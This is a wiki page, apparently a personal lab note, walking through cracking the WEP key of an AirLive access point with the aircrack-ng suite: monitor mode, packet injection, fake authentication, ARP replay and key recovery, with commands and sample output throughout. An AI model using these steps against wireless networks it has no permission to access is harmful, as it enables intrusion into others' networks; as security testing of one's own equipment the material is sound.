User Tools

Site Tools


unix:wep

WEP testing

MAC address: e8:de:27:0c:f4:ec

AirLive Wireless AP

Cell 04 - Address: 00:4F:62:17:6B:E3
          Channel:11
          Frequency:2.462 GHz (Channel 11)
          Quality=70/70  Signal level=-15 dBm
          Encryption key:on
          ESSID:"airlive"
          Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                    9 Mb/s; 12 Mb/s; 18 Mb/s
          Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
          Mode:Master
          Extra:tsf=00000000bbb49101
          Extra: Last beacon: 60ms ago
          IE: Unknown: 00076169726C697665
          IE: Unknown: 010882848B960C121824
          IE: Unknown: 03010B
          IE: Unknown: 2A0100
          IE: Unknown: 32043048606C
          IE: Unknown: DD0700E04C01020300

1. Scan the available networks and their details:

iwlist wlan1 scan | less

Mark especially its MAC address and Channel, To match the frequency to the channel, check out: http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel.html#wp134132 . This will give you the frequency for each channel.

2. Shut down the network card from normal operation

airmon-ng stop wlan1

3. Start the itnerface in monitor mode

airmon-ng start wlan1 11

where 11 is the AP's channel.

wlan1		Atheros 	ath9k - [phy1]
				(monitor mode enabled on mon0)
wlan0		Unknown 	iwlwifi - [phy0]

4. Test, that injection is working

aireplay-ng -9 -a 00:4F:62:17:6B:E3 wlan1
12:11:13  Waiting for beacon frame (BSSID: 00:4F:62:17:6B:E3) on channel 11
12:11:13  Trying broadcast probe requests...
12:11:13  Injection is working!
12:11:15  Found 1 AP

12:11:15  Trying directed probe requests...
12:11:15  00:4F:62:17:6B:E3 - channel: 11 - 'airlive'
12:11:15  Ping (min/avg/max): 1.105ms/6.782ms/17.021ms Power: -25.83
12:11:15  30/30: 100%

5. Start to capture the IV's. Open another console and run

 airodump-ng -c 11 --bssid 00:4F:62:17:6B:E3 -w wifi_iv wlan1

where -c 11 is the AP's channel and -w wifi_iv prefix for the files with IV's.

6. In the meanwhile, you need to associate your MAC address with the AP in order to collect IV's. Use either fake authentization (see further) or MAC address of already-connected host.

aireplay-ng -1 6000 -o 1 -q 10 -a 00:4F:62:17:6B:E3 -h E8:DE:27:0C:F4:EC wlan1

where -1 is the fake authentization,
6000 means re-association every 6000 seconds,
-o 1 sends only one set of packets at a time; multiple can confuse some AP's
-q 10 keep sending alive packets every 10 s
-h E8:DE:27:0C:F4:EC is your MAC address of wlan1 or MAC of another already-connected host

7. Open another console and try to listen for ARP requests and re-inject them back to AP

aireplay-ng -3 -b 00:4F:62:17:6B:E3 -h E8:DE:27:0C:F4:EC wlan1

It will start listening for ARP requests and when it hears one, aireplay-ng will immediately start to inject it. See the Generating ARPs section for tricks on generating ARPs if your screen says “got 0 ARP requests” after waiting a long time.

You can confirm that you are injecting by checking your airodump-ng screen. The data packets should be increasing rapidly.

If you receive a message similar to “Got a deauth/disassoc packet. Is the source mac associated?”, this means you have lost association with the AP. All your injected packets will be ignored. You must return to the fake authentication step (Step 6) and successfully associate with the AP.

8. Run aircrack-ng to obtain the WEP key in a new console

aircrack-ng -b 00:4F:62:17:6B:E3 wifi_iv*.cap

You can also add -n 64 if you know the key is only 64 bits long. This is a very quick PTW method, which is, however, usable only as long as you are able to collect ARP request/reply packets.

To use FMS/Korek method, you should add -K switch.

You can run this while generating packets. In a short time, the WEP key will be calculated and presented. For FMS/Korek, you will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128 bit keys. If you are using the PTW attack, then you will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128 bit. These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key.

                                 Aircrack-ng 1.1

                 [00:06:18] Tested 4995588 keys (got 328514 IVs)

   KB    depth   byte(vote)
    0    0/  1   AB(  93) 20(  15) 48(  15) 58(  15) AE(  15)
    1    0/  3   CD(  84) 75(  63) 43(  47) 55(  26) 09(  22)
    2    0/  2   EF(  71) 8D(  70) B6(  30) 2F(  15) 37(  15)
    3    0/  1   12( 130) 01(  31) 7C(  30) 26(  29) E7(  28)

                         KEY FOUND! [ AB:CD:EF:12:34 ]
	Decrypted correctly: 100%

Generating ARPs

In order for this tutorial to work, you must receive at least one ARP packet. On your home network, here is an easy way to generate an ARP packet. On a wired or wireless PC, ping a non-existent IP on your home LAN. A wired PC means a PC connected to your LAN via an ethernet cable. Lets say your home LAN address space is 192.168.1.1 through 192.168.1.254. Pick an IP between 1 and 254 which is not assigned to a network device. For example, if the IP 192.168.1.213 is not being used then “ping 192.168.1.213”. This will cause an ARP to be broadcast via your wireless access point and in turn, this will kick off the reinjection of packets by aireplay-ng.

unix/wep.txt · Last modified: 2014/12/22 10:47 by bajeluk